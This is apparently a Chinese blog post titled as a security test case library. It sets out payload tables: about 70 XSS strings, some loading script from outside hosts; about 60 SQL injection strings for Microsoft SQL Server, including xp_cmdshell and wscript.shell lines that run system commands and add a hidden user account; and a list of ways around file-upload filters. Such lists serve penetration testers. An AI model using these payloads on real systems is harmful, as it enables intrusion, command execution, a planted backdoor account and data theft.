XSS | |||
序号 | 用例 | ||
1 | "></iframe><script>alert(123)</script> | ||
2 | ">><script>alert('xss')</script> | ||
3 | "οnfοcus=alert(document.domain)"><" | ||
4 | %22%3cscript%3ealert(%22xss%22)%3c/script%3e | ||
5 | %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e | ||
6 | %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e | ||
7 | %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html | ||
8 | %3Cscript%3Ealert('XSS')%3C/script%3E | ||
9 | );alert('XSS | ||
10 | /></a></><img src=1.gif οnerrοr=alert(1)> | ||
11 | ;exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& | ||
12 | [color=red' οnmοuseοver="alert('XSS')"]mouse over[/color] | ||
13 | [url=javascript:alert('XSS');]click me[/url] | ||
14 | </textarea><script>alert(/xss)</script> | ||
15 | </title><script>alert(/xss/)</script> | ||
16 | <?='<SCRIPT>alert("XSS")</SCRIPT>'?> | ||
17 | <?echo('<src)'; echo('ipt>alert(\"xss\")';</script>');?> | ||
18 | <?echo('<src)'; echo('ipt>alert(\"xss\")';</script>');?> | ||
19 | <BASE href="javascript:alert('XSS');//"> | ||
20 | <BGSOUND src="javascript:alert('XSS');"> | ||
21 | <BODY BACKGROUND="javascript:alert('XSS')"> | ||
22 | <body onLoad="alert('XSS');" | ||
23 | <BODY ONLOAD=alert('XSS')> | ||
24 | <body οnunlοad="javascript:alert('XSS');"> | ||
25 | <br size=\"&{alert('xss')}\"> | ||
26 | <DIV STYLE="background-image: url(javascript:alert('XSS'))"> | ||
27 | <div style="x:expression((window==1)?":eval('r=1;alert(String.fromCharCode(83,83,83));'))"> | ||
28 | <IFRAME src=javascript:alert('XSS')></IFRAME> | ||
29 | <iframe<?php eval chr(11)?>οnlοad=alert('XSS')></iframe> | ||
30 | <IMG DYNSRC="javascript:alert('XSS')"> | ||
31 | <IMG LOWSRC=\"javascript:alert('XSS')\"> | ||
32 | <IMG src="jav ascript:alert('XSS');"> | ||
33 | <img src="javascript:alert('XSS')"> | ||
34 | <IMG src="javascript:alert('XSS');"> | ||
35 | <IMG SRC=\"jav�x9;ascript:alert('xss');\"> | ||
36 | <img src='java\nscript:alert(\"XSS\")'> | ||
37 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | ||
38 | <IMG src=javascript:alert('XSS')> | ||
39 | <IMG src=JaVaScRiPt:alert('XSS')> | ||
40 | <img src=liu.jpg οnerrοr=alert(/xss/)/> | ||
41 | <IMG SRC='vbscript:msgbox(\"XSS\")'> | ||
42 | <IMG STYLE='xss:expre\ssion(alert("XSS"))'> | ||
43 | <LAYER src="http://xss.ha.ckers.org/a.js"></layer> | ||
44 | <LINK REL="stylesheet" href="javascript:alert('XSS');"> | ||
45 | <marquee><script>alert('xss')</script></marquee> | ||
46 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | ||
47 | <scr<script>ipt>alert('xss');</scr</script>ipt> | ||
48 | <script>alert(document.cookie)</script> | ||
49 | <script>alert('XSS')</script> | ||
50 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://test/test.js"></SCRIPT> | ||
51 | <script>var var=1; alert(var)</script> | ||
52 | <scrscriptipt>alert(1)</scrscriptipt> | ||
53 | <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A> | ||
54 | <STYLE TYPE="text/javascript">alert('XSS');</STYLE> | ||
55 | <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | ||
56 | <style>@im\port'\ja\vasc\ript:alert(\"xss\")';</style> | ||
57 | <TABLE BACKGROUND="javascript:alert('XSS')"> | ||
58 | <XML src="javascript:alert('XSS');"> | ||
59 | ='><script>alert(document.cookie)</script> | ||
60 | > <BODY ONLOAD=a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><" | ||
61 | >'"><img src="javascript:alert('xss')"> | ||
62 | ><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(XSS")> | ||
63 | ><script alert(String.fromCharCode(88,83,83))</script> | ||
64 | ><script>alert(1)</script> | ||
65 | ><script>alert(document.cookie)</script> | ||
66 | '>><marquee><h1>XSS<h1></marquee> | ||
67 | a?<script>alert('Vulnerable')</script> | ||
68 | Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))< | ||
69 | getURL("javascript:alert('XSS')") | ||
70 | window.alert("XSS"); | ||
sql注入 | |||
序号 | 用例 | ||
1 | admin'-- | ||
2 | ' or 0=0 -- | ||
3 | " or 0=0 -- | ||
4 | or 0=0 -- | ||
5 | ' or 0=0 # | ||
6 | " or 0=0 # | ||
7 | or 0=0 # | ||
8 | ' or 'x'='x | ||
9 | " or "x"="x | ||
10 | ') or ('x'='x | ||
11 | ' or 1=1-- | ||
12 | " or 1=1-- | ||
13 | or 1=1-- | ||
14 | ' or a=a-- | ||
15 | " or "a"="a | ||
16 | ') or ('a'='a | ||
17 | ") or ("a"="a | ||
18 | hi" or "a"="a | ||
19 | hi" or 1=1 -- | ||
20 | hi' or 1=1 -- | ||
21 | hi' or 'a'='a | ||
22 | hi') or ('a'='a | ||
23 | hi") or ("a"="a[/code] | ||
24 | ; and 1=1 and 1=2 | ||
25 | and 0<>(select count(*) from *) | ||
26 | and 0<>(select count(*) from admin) | ||
27 | and 0<(select count(*) from admin) | ||
28 | and 1<(select count(*) from admin) | ||
29 | and 1=(select count(*) from admin where len(*)>0)-- | ||
30 | and 1=(select count(*) from admin where len(用户字段名称name)>0) | ||
31 | and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0) | ||
32 | and 1=(select count(*) from admin where len(*)>0) | ||
33 | and 1=(select count(*) from admin where len(name)>6) 错误 | ||
34 | and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 | ||
35 | and 1=(select count(*) from admin where len(name)=6) 正确 | ||
36 | and 1=(select count(*) from admin where len(password)>11) 正确 | ||
37 | and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 | ||
38 | and 1=(select count(*) from admin where len(password)=12) 正确 | ||
39 | and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 | ||
40 | and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 | ||
41 | and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- | ||
42 | and 1=(select @@VERSION)-- | ||
43 | and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin))-- | ||
44 | and sa=(Select System_blank>_user)-- | ||
45 | and user_blank>_name()=dbo-- | ||
46 | and 0<>(select user_blank>_name()-- | ||
47 | and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_blank>_cmdshell)-- | ||
48 | ;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll-- | ||
49 | ;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- | ||
50 | ;use master;declare @s int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- | ||
51 | ;DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- | ||
52 | ;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- | ||
53 | declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse | ||
54 | and 0<>(select top 1 paths from newtable)-- | ||
55 | and 1=(select name from master.dbo.sysdatabases where dbid=7)-- | ||
56 | and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) | ||
57 | and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) | ||
58 | and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) | ||
59 | and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin | ||
60 | and uid>(str(id))) | ||
61 | and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) | ||
62 | and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in | ||
上传漏洞 | |||
序号 | 用例 | ||
1 | 检查后缀 | 上传.htaccess | 黑名单 |
1 | 后缀大小写绕过 | 黑名单 | |
1 | 点绕过 | 黑名单 | |
1 | 空格绕过 | 黑名单 | |
1 | ::$DATA绕过 | 黑名单 | |
1 | 配合解析漏洞 | 黑名单 | |
1 | 双后缀名绕过 | 黑名单 | |
1 | MIME绕过 | 白名单 | |
1 | %00截断 | 白名单 | |
1 | 0x00截断 | 白名单 | |
1 | 0x0a截断 | 白名单 | |
1 | 检查内容 | 文件头检查 | |
1 | 突破getimagesize() | ||
1 | 突破exif_imagetype() | ||
1 | 二次渲染 | ||
1 | 其它 | 竞争条件 | |
1 | 上传文件是否有格式限制,是否可以上传exe文件; | ||
1 | 上传文件是否有大小限制,上传太大的文件是否导致异常错误,上传0K的文件是否会导致异常错误,上传并不存在的文件是否会导致异常错误; | ||
1 | 通过修改扩展名的方式是否可以绕过格式限制,是否可以通过压包方式绕过格式限制; | ||
1 | 上传文件大小大于本地剩余空间大小,是否会出现异常错误。 | ||
1 | gif文件头欺骗 |
安全用例库
最新推荐文章于 2023-12-30 23:15:06 发布